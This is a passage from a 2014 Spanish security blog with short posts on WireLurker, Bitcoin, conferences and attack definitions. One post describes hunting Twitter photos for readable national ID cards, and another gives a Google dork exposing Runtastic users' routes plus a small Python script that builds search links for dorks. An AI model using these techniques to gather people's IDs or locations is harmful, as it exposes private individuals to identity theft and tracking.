Me parece una herramienta genial y que muchos programadores de php tendrían que pasarla una vez acabado su trabajo. Así que todo aquellos que la queráis provar os dejo aquí: 

Sed Buenos ;) 

lunes, 10 de noviembre de 2014

iOS/OSX.- WireLurker La Nueva Moda Del Malware.

Ya es sabido que en este blog no hablo mucho de Apple a no ser que la noticia valga la pena y esta lo vale. 

WireLurker es un malware capaz de instalar contenido en smarthpones con iOS  con Jailbreak y OSX. Vamos que es capaz de instalarte cualquier cosa que el quiera sin que tu te enteres. 



"WireLurker puede instalar aplicaciones de terceros en dispositivos iOS con Jailbreak y OS X, según comentó la gente de Palo Alto. Este malware ha sido descubierto por [Claud Xiao de Unit 42], el equipo de inteligencia de amenazas de la empresa, que ha publicado un informe detallado denominado [WireLurker: Una nueva era en el malware para iOS y OS X]. A raíz del descubrimiento inicial por un desarrollador, investigadores de la empresa el impacto potencial de WireLurker, evaluando métodos disponibles para prevenir, detectar, contener y eliminar la amenaza."
Apple ya se a puesto manos a la obra paar bloquearlo:

Pero, una cosa es bloquearlo y la otra es detectarlo y eliminarlo. ¿Como podemos saber si hemos sido infectados? Bueno, ya han ido saliendo herramientas pero me voy a centrar en recomendaros, como no, una herramienta desarrollada en Python. WireLurkerDetector hecha por la gente de PaloAltoNetworks. 

Decarga tanto para OSX como para Windows: 
Sed Buenos y repasad vuetros iOS/OSX y Windows. 

domingo, 9 de noviembre de 2014

#9N .- Tweets y DNIs

Hoy ha sido un día un poco especial aquí en Barcelona por el tema de las votaciones. Yo, he ido a votar y me he encontrado con un cámara fotografiando el evento y a gente haciéndose un montón de fotos/selfies. Así que, como vivimos en un mundo donde las fotos se suben a Internet al segundo de ser fotografiadas y estaba en un lugar publico donde la gente mostraba su DNI para votar, se me ha ocurrido buscar en los diferentes Hashtags en twitter alguna foto de algún documento nacional de identidad a ver si encontraba alguno completo. 

xDDD me ha encantado este meme

Al princio he encontrado estos ... una pena que Twiitter re-escale la imágenes y no tenga ningún programa para poder hacer zoom decentemente. 


Esta sobretodo es la que me ha dado mas pena.


Bueno, después de un rato mas dandole viendo mas fotos he encontrado un par que casi llega a ser lo que yo buscaba.

 Pero bueno, al final utilizando un poco de magia se encuentra lo que se quiere.


Por favor, si estas leyendo esta entrada y uno de estos DNI es el tuyo. Borra esta información de inmediato ya que pueden ser utilizada para fines ilícitos.
;
Sed Buenos y borrad las fotos ;) 

Bitcoin.- Una Moneda Muy Volátil ... Literal

Hace unos días dio la casualidad que tanto DoubleReboot como Snifer me pasaron noticias relacionadas con la moneda virtual Bitcoin pero no eran noticias buenas. La verdad es que hacia mucho que no hablaba de esta moneda así que aquí van un par de curiosidades. 

Que bonita es esta granja de Bitcoins ¿No?


Pues aquí la tenéis en un color mas negro: 


Nah, en realidad es una broma. Pero la segunda foto si que corresponde a una granja de minado de Bitcoins que se quemó y dejo una buena capa de negrura en la "nave" donde estaba. 

Podéis encontrar mas información en este hilo: 

Pero, no solo las instalaciones de minado de este tipo de monedas son delicados si no que las mismas transacciones (dependiendo el sito) pueden llegar hasta a generar bitcoins de la nada. 


Espero que os hayan gustado estas curiosidades.

Sed Buenos ;) 

viernes, 7 de noviembre de 2014

Video.- Hack&Beers En HangoutON

Ayer Jueves por la noche los responsables de la comunidad de [Hack&Beers] estuvieron en HangoutON explicando el funcionamiento de la comunidad a si como la creación de eventos y las próximas quedadas.Yo pillé el directo un poco tarde pero como queda grabado en Youtube he podido retomarlo esta mañana.


La verdad es que me ha gustado mucho la idea y todo lo que Hack&Beers trae consigo. Así que estoy desando que llegue la Hack&Beers de Barcelona. Os dejo el vídeo aquí abajo para que sepáis de que estoy hablando. 



 Sed Buenos ;)

jueves, 6 de noviembre de 2014

PyConES 2014.- ¿Qué? ¿Una CON De Python En España?

En abril os hablé de la PyCON US en Montreal y la verdad es que me quede con un regusto agridulce al no saber de la existencia de algún congreso como este. Hasta hoy que, mirando twitter, me he encontrado con la PyConES 2014 en Zaragoza. 


PyConES es la conferencia nacional de python que celebrará su segunda edición, tras el éxito de la desarrollada el pasado año en Madrid, bajo el formato del evento mundial PyCon. En esta ocasión, la organización recae en el hackerspace de Zaragoza, Dlabs con la colaboración de la asociación Python España y el Grupo de Python Zaragoza.
Mas información y venta de entradas:

Me encanta que haya salido una iniciativa así en España y mas con un lenguaje de programación que va a dar y esta dando mucho de si. Así que, espero que a todos los que os interesa python y viváis cerca de Zaragoza os apuntéis. Si yo pudiera, También estaría allí.

Sed Buenos ;) 

Ataques Typosquatting & Drive By Download

Hoy poniéndome un poco mas en serio con algunas certificaciones, en el material, han aparecido un par de términos que siempre los había pasado un poco por encima pero está bien comentarlos.  En este caso son un par de ataques que si que es verdad que son muy utilizados por los malos pero en la mayoría de explicaciones los pasamos por alto. 

Ataque  Typosquatting: 
Ataque Drive by Download: 
  • Es una técnica que los ciberdelincuentes aplican para propagar malware gracias al aprovechamiento de vulnerabilidades existentes en diferentes sitios web, las cuales, una vez explotadas, permiten la inyección de código malicioso entre el código original del sitio. El objetivo es infectar de manera masiva los ordenadores de los usuarios desprevenidos con solo ingresar a un sitio web comprometido.

Sed Buenos ;) 

martes, 4 de noviembre de 2014

Wenpcfg.- Ocultando/Mostrando Directorios Sensibles.

Hace mucho que tenia esta entrada en el tintero por que no me parece una forma muy buena de asegurar directorios que puedan ser susceptibles a un ataque pero si que es verdad que si estamos en un entorno como CITRIX o similares si que nos puede ayudar. 

Hablo de WENPCFG las siglas de (Windows Explorer Navigation Pane Configuration) una herramienta que nos ayuda a ocultar o mostrar diferentes directorios. 


Si le queréis echar un ojo a la herramienta: 
Mas información y fuente de esta entrada: 

lunes, 3 de noviembre de 2014

La Info de Runtastic Indexada y PoC Html en Python

Hoy en el blog del Maligno hemos aprendido como [extraer las rutas y datos de bastantes usuarios de la app Runstastic] gracias a Google, a su araña y al Dork: 
  •  site:runtastic.com/es/usuarios/ rutas



Yo he estado haciendo mis pruebas gracias a la herramienta que cree para el blog de [estación informática] para hacer una búsqueda en 3 buscadores al mismo tiempo.  el cual tengo un poco abandonado pero espero que esta PoC que voy a presentar ahora sirva para una buena entrada. 

Búsqueda en Google: 


Búsqueda en Bing:


Búsqueda en Duck Duck Go: 

No sale el numero de resultados pero hay muchos


Después de jugar un rato con esto se me ha iluminado la bombilla ya que, tenia [una idea clara hace mucho] pero no sabia como aplicarla. La verdad es que hacer muchas búsquedas en diferentes buscadores y cada uno en una pestaña diferente es muy molesto. Así que, es mucho mas fácil crear una tabla en html, especificar que buscador es y meterle un enlace en la columna de al lado para que se le pued hacer clic y acceder a la búsqueda deseada. 


Como veis la PoC está limitada a 3 buscadores que mañana intentaré que sean mas. Pero, es un buen sistema para probar un mismo Dork con diferentes buscadores/arañas a ver que resultados nos dan. 

Os dejo el código del script de la PoC aaquí: 

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import webbrowser

def webinput():
while True:
busqueda = raw_input("Copia tu Dork favorito: ")
search(busqueda)

def search(peticion):
google =  "https://www.google.com/?#q="+ peticion
bing = "https://www.bing.com/search?q="+ peticion
duckgo = "https://duckduckgo.com/?q="+ peticion
list = [google,bing,duckgo]
html ="""
<html>
<head>
<meta charset="UTF-8">
<title>StateX Results</title>
</head>
<body>
<h1>
Resultados
</h1>
<table>
<tr>
  <td><strong>Buscador</strong></td>
  <td><strong>Url Busqueda</strong></td>
</tr>

<tr>
  <td>Google</td>
  <td><a href="%s">Ver Resultados</a></td>
</tr>

<tr>
  <td>Bing</td>
  <td><a href="%s">Ver Resultados</a></td>
</tr>

<tr>
  <td>DuckDuckGo</td>
  <td><a href="%s">Ver Resultados</a></td>
</tr>
</table>
</body>
</html>
""" %(google,bing,duckgo)
d1 = open("resutados.html", "w")
d1.write(html)
d1.close
print "Resutados guardados como resultados.txt"


if __name__ == "__main__":
print """ 

|-----| Bing, Google & DuckDuckGo |-----|
                          Hacking   

""" 
webinput()

De momento no lo he subido a Github por que me parece un poco tontería y quiero afinarlo un poco mas pero aquí tenéis una idea para todos lo que quieran hacer algo con un html. 

Sed Buenos ;)